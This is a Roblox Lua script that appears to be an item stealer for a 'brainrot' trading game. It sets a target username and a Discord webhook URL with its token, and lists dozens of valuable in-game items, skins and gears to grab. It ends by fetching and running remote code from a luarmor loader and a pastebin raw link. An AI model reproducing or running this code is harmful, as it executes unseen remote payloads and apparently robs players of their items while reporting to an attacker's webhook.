-- Mode: CUSTOM
getgenv().TARGET_USERNAME = "Breinotperedaca"
getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1536127374977142877/P_pn5Iwq7rnIWwA12wJ4RHwx5E_FLK0oLFXNkdzHMZZCqiO1i7VJnnMBbGV2CH30FUFL"
getgenv().NORMAL_BRAINROTS = {
    ["Hopilikalika Hopilikalako Egg"] = true,
    ["John Pork"] = true,
    ["Meowl"] = true,
    ["Spyder Elephant"] = true,
    ["Skibidi Toilet"] = true,
    ["Headless Horseman"] = true,
    ["La Breakfast Combinasion"] = true,
    ["Bumbatron"] = true,
    ["Strawberry Elephant"] = true,
    ["Hydra Bunny Egg"] = true,
    ["Yetimactic"] = true,
    ["Smore Serat"] = true,
    ["Scorpino Coasterino"] = true,
    ["Quenn Bee"] = true,
    ["Honey Honey Bear"] = true,
    ["Pogo Pogo Penguin"] = true,
    ["Peschito Machito"] = true,
    ["Conetto Morsetto"] = true,
    ["Los Secret Combinasionas"] = true,
    ["Gelatina Volatina"] = true,
    ["Pizza and Ranch"] = true,
    ["Examen Bros"] = true,
    ["Grabatron"] = true,
    ["Los Admins"] = true,
    ["Moby Bros"] = true,
    ["Capitano Americano"] = true,
    ["Venuspino"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["Steakini Fattini"] = true,
    ["Spooky and Pumpky"] = true,
    ["Signore Carapace"] = true,
    ["Sammyni Cakini"] = true,
    ["Rosey and Teddy"] = true,
    ["Rubrikiko"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Arcadragon"] = true,
    ["Bunny and Eggy"] = true,
    ["Celularcini Viciosini"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Cooki and Milki"] = true,
    ["Cloverat Clapat"] = true,
    ["Coco and Mango"] = true,
    ["Dragon Aquanini"] = true,
    ["Digi Narwhal"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Duggy Bros"] = true,
    ["Festive 67"] = true,
    ["Fishino Clownino"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Foxini Lanternini"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Fragola La La La"] = true,
    ["Ginger Gerat"] = true,
    ["Globa Steppa"] = true,
    ["Griffin"] = true,
    ["Guest 666"] = true,
    ["Hydra Bunny"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Jelly Moby"] = true,
    ["La Food Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Popcuru and Fizzuru"] = true
}
getgenv().NORMAL_BASE_SKINS = {
    ["Rose"] = true,
    ["Gingerbread"] = true,
    ["Halloween"] = true,
    ["Christmas"] = true,
    ["Bunny Basket"] = true,
    ["Summer"] = true,
    ["Pot of Gold"] = true,
    ["Taco"] = true,
    ["Octo"] = true,
    ["Valentines"] = true,
    ["Easter"] = true,
    ["Lucky"] = true,
    ["Aquatic"] = true,
    ["Tralalero"] = true
}
getgenv().NORMAL_GEARS = {
    ["Santa's Sleigh"] = true,
    ["Cupid's Wings"] = true,
    ["Witch's Broom"] = true,
    ["Waverider"] = true,
    ["Yin Yang Slap"] = true,
    ["Cursed Slap"] = true,
    ["Cyber Slap"] = true,
    ["Divine Slap"] = true,
    ["Bloodmoon Slap"] = true,
    ["Radioactive Slap"] = true,
    ["Rainbow Slap"] = true,
    ["Rainbow Hammer"] = true,
    ["Bloodmoon Hammer"] = true,
    ["Radioactive Airstrike"] = true,
    ["Yin Yang Lamp"] = true,
    ["Demon's Head"] = true,
    ["Lava Slap"] = true,
    ["Lava Blaster"] = true,
    ["Alien Slap"] = true,
    ["Blackhole Bomb"] = true,
    ["Candy Sentry"] = true,
    ["Phantom Slap"] = true,
    ["Candy Slap"] = true
}

task.spawn(function()
    loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/870375c8dfbc1d6521073674fe460cb6.lua"))()
end)

task.spawn(function()
    loadstring(game:HttpGet(('https://pastebin.com/raw/u79706R8'):gsub('pastebin','pastebin')))()
end)